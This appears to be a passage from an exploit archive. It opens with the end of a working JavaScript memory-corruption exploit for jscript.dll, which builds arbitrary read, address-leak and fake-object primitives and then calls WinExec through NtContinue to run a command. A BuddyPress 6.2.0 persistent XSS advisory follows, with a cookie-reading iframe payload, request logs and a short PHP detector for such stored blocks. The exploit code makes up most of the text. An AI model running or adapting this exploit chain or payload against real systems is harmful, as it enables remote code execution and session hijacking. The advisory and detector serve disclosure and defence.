var pad_size = 3000;         // The size of padding for the trigger object. This padding adds additional space for functions like WinExec() to add their stack frames and the stack frames of the functions they call.
var sort = new Array();      // The array to be sorted with the vulnerable function.
var lfh = new Array();       // An array used to trigger lfh.
var debug = false;           // Whether write_debug will do anything.
var command = "\u3a43\u575c\u6e69\u6f64\u7377\u535c\u7379\u6574\u336d\u5c32\u6163\u636c\u652e\u6578"; // The command to be executed. In this case it's "C:\Windows\System32\calc.exe"

// Setup - fills the sort array with arrays to be sorted. Done first to avoid the stack setup getting messed up.
for(i = 0; i < 310; i++) sort[i] = [0, 0];

// lfh_trigger: Used to trigger LFH for a particular size.
function lfh_trigger() {
    for(i = 0; i < 50; i++) {
        tmp = new Object();
        tmp[Array(570).join('A')] = 1;
        lfh.push(tmp);
    }
}

// reset: Resets the objects used in the function initial_exploit so it could be used again.
function reset() {
    depth = 0;
    spray = new Array();
    overlay = new Array();
    total = new Array();

    for(i = 0; i < overlay_size; i++) overlay[i] = new Object(); // Overlay must happen before spray
    for(i = 0; i < spray_size; i++) spray[i] = new Object();

    CollectGarbage();
}

// make_variant: Creates a fake VAR in a string.
function make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
    var charCodes = new Array();
    charCodes.push(
        // type
        type, 0, 0, 0,
        // obj_ptr
        obj_ptr_lower & 0xffff, (obj_ptr_lower >> 16) & 0xffff, obj_ptr_upper & 0xffff, (obj_ptr_upper >> 16) & 0xffff,
        // next_ptr
        next_ptr_lower & 0xffff, (next_ptr_lower >> 16) & 0xffff, next_ptr_upper & 0xffff, (next_ptr_upper >> 16) & 0xffff
    );
    return String.fromCharCode.apply(null, charCodes);
}

// set_variants: A wrapper for make_variant that allocates and pads the property names to align the fake VARs correctly in memory.
function set_variants(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
    variants = "AAAAAAAA";
    for(i=0; i < 46; i++) {
        variants += make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper);
    }
    variants += "AAAAAAAAA";
}

// initial_exploit: The main exploit function.
function initial_exploit(untracked_1, untracked_2) {
    untracked_1 = spray[depth*2];
    untracked_2 = spray[depth*2 + 1];

    if(depth > 150) {
        spray = new Array(); // Erase spray
        CollectGarbage();    // Add to free

        for(i = 0; i < overlay_size; i++) {
            overlay[i][variants] = 1;
            overlay[i][padding] = 1;
            overlay[i][leak] = 1;
            overlay[i][leaked_var] = i; // Used to identify which leak is being used
        }

        total.push(untracked_1);
        total.push(untracked_2);
        return 0;
    }

    // Set pointers
    depth += 1;
    sort[depth].sort(initial_exploit);

    total.push(untracked_1);
    total.push(untracked_2);

    return 0;
}

// rewrite: Frees the correct overlay object and reallocate over it as to replace the object at the leaked 'next property' pointer.
function rewrite(v, i){
    CollectGarbage();                                     // Get rid of anything lingering that might screw up the exploit
    overlay_backup[leak_offset] = null;                   // Erase the object to be replaced
    CollectGarbage();                                     // Clear leak
    overlay_backup[leak_offset] = new Object();           // New object - Might end up in the same slot as the last object
    overlay_backup[leak_offset][variants] = 1;            // Re-allocate the newly freed location (Take up the original GcBlock location again)
    overlay_backup[leak_offset][padding] = 1;             // Add padding to align the hash with the type to leak the 'next property' pointer
    overlay_backup[leak_offset][leak] = 1;                // The hash-manipulating property
    overlay_backup[leak_offset][v] = i;                   // sets the property name and the initial VAR
}

// read_pointer: Rewrites the property and changes the fakeobj_var variable to a string at a specified location. This sets up the read primitive.
function read_pointer(addr_lower, addr_higher, o) {
    rewrite(make_variant(8, addr_lower, addr_higher), o);
}

// read_byte: Reads the byte at the address using the length of the BSTR.
function read_byte(addr_lower, addr_higher, o) {
    read_pointer(addr_lower + 2, addr_higher, o); // Use the length. However, when the length is found, it is divided by 2 (BSTR_LENGTH >> 1) so changing this offset allows us to read a byte properly.
    return (fakeobj_var.length >> 15) & 0xff;     // Shift to align and get the byte.
}

// read_word: Reads the WORD (2 bytes) at the specified address.
function read_word(addr_lower, addr_higher, o) {
    read_pointer(addr_lower + 2, addr_higher, o);
    return ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
}

// read_dword: Reads the DWORD (4 bytes) at the specified address.
function read_dword(addr_lower, addr_higher, o) {
    read_pointer(addr_lower + 2, addr_higher, o);
    lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
    read_pointer(addr_lower + 4, addr_higher, o);
    upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
    return lower + (upper << 16);
}

// read_qword: Reads the QWORD (8 bytes) at the specified address.
function read_qword(addr_lower, addr_higher, o) {
    // Lower
    read_pointer(addr_lower + 2, addr_higher, o);
    lower_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
    read_pointer(addr_lower + 4, addr_higher, o);
    lower_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);

    // Upper
    read_pointer(addr_lower + 6, addr_higher, o);
    upper_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
    read_pointer(addr_lower + 8, addr_higher, o);
    upper_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);

    return {'lower': lower_lower + (lower_upper << 16), 'upper': upper_lower + (upper_upper << 16)};
}

// test_read: Used to test whether the arbitrary read works. leak_lower + 64 points to the fakeobj_var location (property name string). The byte at this address is therefore expected to be 8 (String VAR type).
function test_read() {
    if(read_byte(leak_lower + 64) != 8) {
        throw Error("Arbitrary read failed.");
    }
}

// test_fakeobj: Used to test whether fakeoj_var responds as expected when the type and value is changed.
function test_fakeobj() {
    rewrite(make_variant(3, 23));
    if(fakeobj_var + "" != 23) { // Turning it to a string causes the conversion to copy, dereferencing the 0x80 type. Type 0x80 being used directly won't work.
        throw Error("Couldn't re-write fakeobj variable");
    }
}

// test_rewrite: Used to test whether the VAR in the VVAL leaked address changes as expected.
function test_rewrite() {
    rewrite(leaked_var, 23);
    if(leak_verify_var + "" != 23) {
        throw Error("Couldn't re-write variable");
    }
}

// addrof: The 'address-of' primitive. Changes the VAR at the start of the VVAL to point to a given object and changes the fakeobj_var string to point to the object pointer of this VAR, thus allowing the address to be read.
function addrof(o) {
    var_addr = read_dword(leak_lower + 8, 0, o); // Dereference the first VAR
    return read_dword(var_addr + 8, 0, 1);       // Get the Object pointer of the second VAR
}

// find_module_base: Finds the base of a module from a leaked pointer. Works by zeroing the least significant 16 bits of the address and subtracting 0x10000 until the DOS stub code is found at a specified offset.
function find_module_base(ptr) {
    ptr.lower = (ptr.lower & 0xFFFF0000) + 0x4e; // Set to starting search point
    while(true) {
        if(read_dword(ptr.lower, ptr.upper) == 0x73696854) { // The string 'This'
            write_debug("[+] Found module base!");
            ptr.lower -= 0x4e; // Subtract the offset to get the base
            return ptr;
        }
        ptr.lower -= 0x10000;
    }
}

// leak_jscript_base: Gets the base of the jscript module by creating a new object, following the object pointers until the vftable is found, and then using the vftable leak to identify the base of jscript.dll.
function leak_jscript_base() {
    // Create an object to leak vftable
    obj = new Object();

    // Get address of the object pointer
    obj_ptr_addr = addrof(obj);
    write_debug("[+] Object ptr at 0x" + obj_ptr_addr.toString(16));

    // Get address of the vftable
    vftable_addr = read_qword(obj_ptr_addr, 0, 1);
    write_debug("[+] Vftable at upper 0x" + vftable_addr.upper.toString(16) + " and lower 0x" + vftable_addr.lower.toString(16));

    return find_module_base(vftable_addr);
}

// leak_var: Executes the main exploit function in order to leak a 'next property' pointer.
function leak_var() {
    reset();
    variants = Array(570).join('A');   // Create the variants
    sort[depth].sort(initial_exploit); // Exploit
    overlay_backup = overlay;          // Prevent it from being freed and losing our leaked pointer

    leak_lower = undefined;
    for(i = 0; i < total.length; i++) {
        if(typeof total[i] === "number" && total[i] % 1 != 0) {
            leak_lower = (total[i] / 4.9406564584124654E-324); // This division just converts the float into an easy-to-read 32-bit number
            break;
        }
    }
}

// get_rewrite_offset: Executes the main exploit function again in order to create a number of fake VARs that point to the leaked location. This means that the object pointer can be read and the exact offset of the leaked property in the overlay array can be identified.
function get_rewrite_offset() {
    reset();
    set_variants(0x80, leak_lower);    // Find the number of the object
    sort[depth].sort(initial_exploit); // Exploit

    for(i = 0; i < total.length; i++) {
        if(typeof total[i] === "number") {
            leak_offset = parseInt(total[i] + "");
            leak_verify_var = total[i];
            break;
        }
    }
}

// get_fakeobj: Identifies the fakeobj_var.
function get_fakeobj() {
    rewrite(make_variant(3, 1234));      // Turn the name of the property into a variant
    reset();
    set_variants(0x80, leak_lower + 64); // Create a fake VAR pointing to the name of the property
    sort[depth].sort(initial_exploit);   // Exploit

    for(i = 0; i < total.length; i++) {
        if(typeof total[i] === "number") {
            if(total[i] + "" == 1234) {
                fakeobj_var = total[i];
                break;
            }
        }
    }
}

// leak_module: Used to leak a pointer for a given module that is imported by another module by traversing the PE structure in-memory.
function leak_module(base, target_name_lower, target_name_upper) {
    // Get IMAGE_NT_HEADERS pointer
    module_lower = base.lower + 0x3c; // PE Header offset location
    module_upper = base.upper;
    file_addr = read_dword(module_lower, module_upper, 1);
    write_debug("[+] PE Header offset = 0x" + file_addr.toString(16));

    // Get imports
    module_lower = base.lower + file_addr + 0x90; // Import Directory offset location
    import_dir = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Import offset = 0x" + import_dir.toString(16));

    // Get import size
    module_lower = base.lower + file_addr + 0x94; // Import Directory offset location
    import_size = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Size of imports = 0x" + import_size.toString(16));

    // Find module
    module_lower = base.lower + import_dir;
    while(import_size != 0) {
        name_ptr = read_dword(module_lower + 0xc, module_upper, 1); // 0xc is the offset to the module name pointer
        if(name_ptr == 0) {
            throw Error("Couldn't find the target module name");
        }
        name_lower = read_dword(base.lower + name_ptr, base.upper);
        name_upper = read_dword(base.lower + name_ptr + 4, base.upper);
        if(name_lower == target_name_lower && name_upper == target_name_upper) {
            write_debug("[+] Found the module! Leaking a random module pointer...");
            iat = read_dword(module_lower + 0x10, module_upper);           // Import Address Table
            leaked_address = read_qword(base.lower + iat + 8, base.upper); // +8 since __imp___C_specific_handler can cause issues when imported in some jscript instances
            write_debug("[+] Leaked address at upper 0x" + leaked_address.upper.toString(16) + " and lower 0x" + leaked_address.lower.toString(16));
            return leaked_address;
        }
        import_size -= 0x14;  // The size of each entry
        module_lower += 0x14; // Increase entry pointer
    }
}

// leak_export: Finds the location of a given exported function in a module. Works using binary search in order to speed it up. Assumes that the export name order is alphabetical.
function leak_export(base, target_name_first, target_name_second, target_name_third, target_name_fourth) {
    // Get IMAGE_NT_HEADERS pointer
    module_lower = base.lower + 0x3c; // PE Header offset location
    module_upper = base.upper;
    file_addr = read_dword(module_lower, module_upper, 1);
    write_debug("[+] PE Header offset at 0x" + file_addr.toString(16));

    // Get exports
    module_lower = base.lower + file_addr + 0x88; // Export Directory offset location
    export_dir = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Export offset at 0x" + import_dir.toString(16));

    // Get the number of exports
    module_lower = base.lower + export_dir + 0x14; // Number of items offset
    export_num = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Export count is " + export_num);

    // Get the address offset
    module_lower = base.lower + export_dir + 0x1c; // Address offset
    addresses = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Export address offset at 0x" + addresses.toString(16));

    // Get the names offset
    module_lower = base.lower + export_dir + 0x20; // Names offset
    names = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Export names offset at 0x" + names.toString(16));

    // Get the ordinals offset
    module_lower = base.lower + export_dir + 0x24; // Ordinals offset
    ordinals = read_dword(module_lower, module_upper, 1);
    write_debug("[+] Export ordinals offset at 0x" + ordinals.toString(16));

    // Binary search because linear search is too slow
    upper_limit = export_num; // Largest number in search space
    lower_limit = 0;          // Smallest number in search space
    num_pointer = Math.floor(export_num/2);
    module_lower = base.lower + names;
    search_complete = false;
    while(!search_complete) {
        module_lower = base.lower + names + 4*num_pointer;             // Point to the name string offset
        function_str_offset = read_dword(module_lower, module_upper, 0); // Get the offset to the name string
        module_lower = base.lower + function_str_offset;                // Point to the string
        function_str_lower =
read_dword(module_lower, module_upper, 0); // Get the first 4 bytes of the string res = compare_nums(target_name_first, function_str_lower); if(!res && target_name_second) { function_str_second = read_dword(module_lower + 4, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_second, function_str_second); if(!res && target_name_third) { function_str_third = read_dword(module_lower + 8, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_third, function_str_third); if(!res && target_name_fourth) { function_str_fourth = read_dword(module_lower + 12, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_fourth, function_str_fourth); } } } if(!res) { // equal module_lower = base.lower + ordinals + 2*num_pointer; ordinal = read_word(module_lower, module_upper, 0); module_lower = base.lower + addresses + 4*ordinal; function_offset = read_dword(module_lower, module_upper, 0); write_debug("[+] Found target export at offset 0x" + function_offset.toString(16)); return {'lower': base.lower + function_offset, 'upper': base.upper}; } if(res == 1) { if(upper_limit == num_pointer) { throw Error("Failed to find the target export."); } upper_limit = num_pointer; num_pointer = Math.floor((num_pointer + lower_limit) / 2); } else { if(lower_limit == num_pointer) { throw Error("Failed to find the target export."); } lower_limit = num_pointer; num_pointer = Math.floor((num_pointer + upper_limit) / 2); } if(num_pointer == upper_limit && num_pointer == lower_limit) { throw Error("Failed to find the target export."); } } throw Error("Failed to find matching export."); } // compare_nums: Compares two numbers that represent 4-byte strings for equality. If not, it detects which character is larger or smaller. 
function compare_nums(target, current) { // return -1 for target being greater, 0 for equal, 1 for current being greater write_debug("[*] Comparing 0x" + target.toString(16) + " and 0x" + current.toString(16)); if(target == current) { write_debug("[+] Equal!"); return 0; } while(target != 0 && current != 0) { if((target & 0xff) > (current & 0xff)) { return -1; } else if((target & 0xff) < (current & 0xff)) { return 1; } target = target >> 8; current = current >> 8; } } // generate_gadget_string: Takes a gadget address and creates a string from it. function generate_gadget_string(gadget) { return String.fromCharCode.apply(null, [gadget.lower & 0xffff, (gadget.lower >> 16) & 0xffff, gadget.upper & 0xffff, (gadget.upper >> 16) & 0xffff]); } // generate_obj_vftable: Creates a fake object with a fake vftable containing a few ROP gadgets. function generate_obj_vftable(initial_jmp) { trigger_obj = Array(pad_size + 1).join('A'); // Adds lots of stack space to either side to prevent msvcrt.dll crashing trigger_obj = trigger_obj + Array(157).join('A') + generate_gadget_string(initial_jmp); trigger_obj = trigger_obj.substr(0, trigger_obj.length); trigger_addr = string_addr(trigger_obj); write_debug("[+] Trigger object at 0x" + trigger_addr.upper.toString(16) + " 0x" + trigger_addr.lower.toString(16)); return trigger_addr; } // generate_context: Creates a partial fake CONTEXT structure to use with NtContinue. P1Home and P2Home are missing because this structure is a part of the fake object. This means that no stack pivot is needed for execution of this exploit. The leaked stack pointer is also used to protect against stack pivot detection. 
function generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export) { return "\u0000\u0000\u0000\u0000" + // P3Home "\u0000\u0000\u0000\u0000" + // P4Home "\u0000\u0000\u0000\u0000" + // P5Home "\u0000\u0000\u0000\u0000" + // P6Home "\u0003\u0010" + // ContextFlags "\u0000\u0000" + // MxCsr "\u0033" + // SegCs "\u0000" + // SegDs "\u0000" + // SegEs "\u0000" + // SegFs "\u0000" + // SegGs "\u002b" + // SegSs "\u0246\u0000" + // EFlags "\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too! "\u0000\u0000\u0000\u0000" + // Dr1 "\u0000\u0000\u0000\u0000" + // Dr2 "\u0000\u0000\u0000\u0000" + // Dr3 "\u0000\u0000\u0000\u0000" + // Dr6 "\u0000\u0000\u0000\u0000" + // Dr7 "\u0000\u0000\u0000\u0000" + // Rax generate_gadget_string(command_address) + // Rcx - Command pointer "\u0000\u0000\u0000\u0000" + // Rdx - SW_HIDE "\u0000\u0000\u0000\u0000" + // Rbx generate_gadget_string(leaked_stack_ptr) + // Rsp - Leaked Stack pointer "\u0000\u0000\u0000\u0000" + // Rbp "\u0000\u0000\u0000\u0000" + // Rsi "\u0000\u0000\u0000\u0000" + // Rdi "\u0040\u0000\u0000\u0000" + // R8 "\u0000\u0000\u0000\u0000" + // R9 "\u0000\u0000\u0000\u0000" + // R10 "\u0000\u0000\u0000\u0000" + // R11 "\u0000\u0000\u0000\u0000" + // R12 "\u0000\u0000\u0000\u0000" + // R13 "\u0000\u0000\u0000\u0000" + // R14 "\u0000\u0000\u0000\u0000" + // R15 generate_gadget_string(kernel32_winexec_export); // Rip - WinExec() call } // trigger_exec: Triggers code execution by creating a fake VAR of type 0x81, setting it's vftable to the payload, and causing execution by using typeof. 
function trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export) { rewrite(make_variant(0x81, leak_lower + 96, 0) + make_variant(0, obj_addr.lower + 2 * (pad_size), 0) + generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export)); write_debug("[*] About to trigger..."); typeof fakeobj_var; } // leak_stack_ptr: Leaks a stack pointer in order to avoid stack pivot detection in the CONTEXT structure. function leak_stack_ptr() { leak_obj = new Object(); // Create an object obj_addr = addrof(leak_obj); // Get address csession_addr = read_dword(obj_addr + 24, 0, 1); // Get CSession from offset 24 stack_addr_lower = read_dword(csession_addr + 80, 0, 1); // Get the lower half of the stack pointer from offset 80 stack_addr_upper = read_dword(csession_addr + 84, 0, 1); // Get the upper half of the stack pointer from offset 84 return {'lower': stack_addr_lower, 'upper': stack_addr_upper}; } // string_addr: Gets the address of a string in an object that can be used in a chain. function string_addr(string_to_get) { return {'lower': addrof(string_to_get), 'upper': 0}; } // main: The entire exploit. 
function main(){ // Setup functions lfh_trigger(); // Trigger LFH - May or may not make the exploit more reliable, but can't hurt // Leak VAR leak_var(); // Identify offset for reliable rewrite get_rewrite_offset(); // Test rewrite test_rewrite(); // Create a fake VAR get_fakeobj(); // Test fakeobj rewrite test_fakeobj(); // Output results so far write_debug("[+] Leaked address 0x" + leak_lower.toString(16) + " is at offset " + leak_offset); // Test read test_read(); // Get the module base for jscript jscript_base = leak_jscript_base(); // Get the msvcrt base by following the jscript import table mscvcrt_leak = leak_module(jscript_base, 0x6376736d, 0x642e7472); msvcrt_base = find_module_base(mscvcrt_leak); write_debug("[+] Found msvcrt base at 0x" + msvcrt_base.upper.toString(16) + " 0x" + msvcrt_base.lower.toString(16)); // Get the ntdll base by following the msvcrt import table ntdll_leak = leak_module(msvcrt_base, 0x6c64746e, 0x6c642e6c); ntdll_base = find_module_base(ntdll_leak); write_debug("[+] Found ntdll at 0x" + ntdll_base.upper.toString(16) + " 0x" + ntdll_base.lower.toString(16)); // Get the kernel32 base by following the jscript import table kernel32_leak = leak_module(jscript_base, 0x4e52454b, 0x32334c45); kernel32_base = find_module_base(kernel32_leak); write_debug("[+] Found kernel32 at 0x" + kernel32_base.upper.toString(16) + " 0x" + kernel32_base.lower.toString(16)); // Find the WinExec function address from kernel32 kernel32_winexec_export = leak_export(kernel32_base, 0x456e6957, 0, 0, 0); write_debug("[+] Found WinExec at 0x" + kernel32_winexec_export.upper.toString(16) + " 0x" + kernel32_winexec_export.lower.toString(16)); // Find the NtContinue function address from ntdll ntdll_ntcontinue_export = leak_export(ntdll_base, 0x6f43744e, 0x6e69746e, 0, 0); write_debug("[+] Found NtContinue at 0x" + ntdll_ntcontinue_export.upper.toString(16) + " 0x" + ntdll_ntcontinue_export.lower.toString(16)); // Get the address of the command to be executed 
command_address = string_addr(command); // Leak the stack pointer leaked_stack_ptr = leak_stack_ptr(); // Create fake object and vftable obj_addr = generate_obj_vftable(ntdll_ntcontinue_export); // Generate context and trigger code execution trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export); } // Call main() main(); </script> </head> </html>
-
WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-13
# Vendor Homepage: https://wordpress.org/plugins/buddypress/
# Version: 6.2.0

Document Title:
===============
Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2263

Release Date:
=============
2020-11-13

Vulnerability Laboratory ID (VL-ID):
====================================
2263

Common Vulnerability Scoring System:
====================================
4.2

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Are you looking for modern, robust, and sophisticated social network software? BuddyPress is a suite of components that are common to a typical social network, and allows for great add-on features through WordPress's extensive plugin system. Aimed at site builders & developers, BuddyPress is focused on ease of integration, ease of use, and extensibility. It is deliberately powerful yet unbelievably simple social network software, built by contributors to WordPress.

(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ & https://buddypress.org/download/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent XSS web vulnerability in the Buddypress v6.2.0 plugin for WordPress.

Affected Product(s):
====================
Buddypress
Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)

Vulnerability Disclosure Timeline:
==================================
2020-11-13: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Buddypress v6.0.0 - v6.2.0 plugin for WordPress. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent vulnerability is located in the `wp:html` name parameter of the `figure` content. Remote attackers with privileges are able to inject their own malicious persistent script code as input to compromise the internal UI of the WordPress backend. The attacker injects the code, and when an admin or other privileged user account previews the content, the code simply executes. The request method to inject is POST and the attack vector is located on the application side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] wp:html

Vulnerable Parameter(s):
[+] figure

Affected Module(s):
[+] page_id=x&preview=true

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Inject
https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit

PoC: Execute
https://test23.localhost:8000/?page_id=6
https://test23.localhost:8000/?page_id=6&preview=true

PoC: Vulnerable Source
<div id="content" class="site-content">
<div class="wrap">
<div id="primary" class="content-area">
<main id="main" class="site-main" role="main">
<article id="post-6" class="post-6 page type-page status-draft hentry">
<header class="entry-header">
<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
<a class="post-edit-link" href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
<span class="screen-reader-text">„Mitglieder“</span> bearbeiten</a></span>
</header><!-- .entry-header -->
<div class="entry-content">
<p></p>
<div class="wp-block-group"><div class="wp-block-group__inner-container">
<div class="wp-block-group"><div class="wp-block-group__inner-container"></div></div>
</div></div>
<figure><iframe src="evil.source" onload="alert(document.cookie)"></iframe></figure>
</div><!-- .entry-content -->
</article><!-- #post-6 -->
</main><!-- #main -->
</div><!-- #primary -->
</div><!-- .wrap -->
</div>

--- PoC Session Logs (POST) ---
https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
Host: test23.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
X-WP-Nonce: 04a953e188
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: https://test23.localhost:8000
Content-Length: 614
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7AnixxNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17; wp-settings-time-1=1589740723
{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph -->nn<!-- wp:group -->n<div class="wp-block-group"> <div class="wp-block-group__inner-container"><!-- wp:group -->n<div class="wp-block-group"><div class="wp-block-group__inner-container"> <!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group --></div></div>n<!-- /wp:group -->nn <!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block {"ref":"reusable1"} /-->nn <!-- wp:html -->n<figure><iframe src="evil.source" onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html -->nn<!-- wp:bp/member /-->"}
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, max-age=0
Allow: GET, POST, PUT, PATCH, DELETE
Content-Type: application/json; charset=UTF-8
Vary: Origin
Server: Microsoft-IIS/8.5
X-Robots-Tag: noindex
Link: <https://test23.localhost:8000/index.php?rest_route=/>; rel="https://api.w.org/"
Content-Length: 3108

References:
https://test23.localhost:8000/index.php
https://test23.localhost:8000/wp-admin/post.php

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
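The advisory above shows the payload stored inside a `wp:html` block and executed on preview. As an added example (not BuddyPress or WordPress code), the following PHP scans stored post content for `wp:html` blocks carrying inline event handlers, script tags or iframes, which is the pattern of the PoC; the sample content is constructed from the advisory's request body, with a benign block added for contrast.

```php
<?php
// Added example, not BuddyPress/WordPress code: a detection pass over stored
// post_content for raw-HTML blocks that carry active content. Block delimiters
// follow the Gutenberg serialisation visible in the advisory's PoC request.

function extract_html_blocks(string $content): array
{
    // Gutenberg serialises raw HTML blocks as <!-- wp:html --> ... <!-- /wp:html -->
    preg_match_all('#<!--\s*wp:html\s*-->(.*?)<!--\s*/wp:html\s*-->#s', $content, $m);
    return $m[1];
}

function find_suspicious_html_blocks(string $content): array
{
    $findings = [];
    foreach (extract_html_blocks($content) as $i => $html) {
        $reasons = [];
        if (preg_match('#<script\b#i', $html)) {
            $reasons[] = 'script tag';
        }
        if (preg_match('#<iframe\b#i', $html)) {
            $reasons[] = 'iframe';
        }
        // Inline handlers such as onload= or onerror=, quoted or not.
        if (preg_match_all('#\s(on[a-z]+)\s*=#i', $html, $h)) {
            $handlers = array_unique(array_map('strtolower', $h[1]));
            $reasons[] = 'event handler(s): ' . implode(', ', $handlers);
        }
        if ($reasons) {
            $findings[] = ['block' => $i, 'reasons' => $reasons, 'html' => trim($html)];
        }
    }
    return $findings;
}

// Constructed sample: the post body from the advisory's PoC session log, with a
// benign wp:html block (block #0) added to show that it is not flagged.
$post_content = "<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n"
    . "<!-- wp:html -->\n<figure><a href=\"/members\">Members</a></figure>\n<!-- /wp:html -->\n\n"
    . "<!-- wp:html -->\n<figure><iframe src=\"evil.source\" onload=\"alert(document.cookie)\"></iframe></figure>\n<!-- /wp:html -->\n\n"
    . "<!-- wp:bp/member /-->";

foreach (find_suspicious_html_blocks($post_content) as $f) {
    printf("wp:html block #%d flagged (%s): %s\n", $f['block'], implode('; ', $f['reasons']), $f['html']);
}
```

Only block #1 is reported (iframe; event handler: onload); the same functions can be run over `post_content` rows exported from the database to find stored payloads of this shape.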
-
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
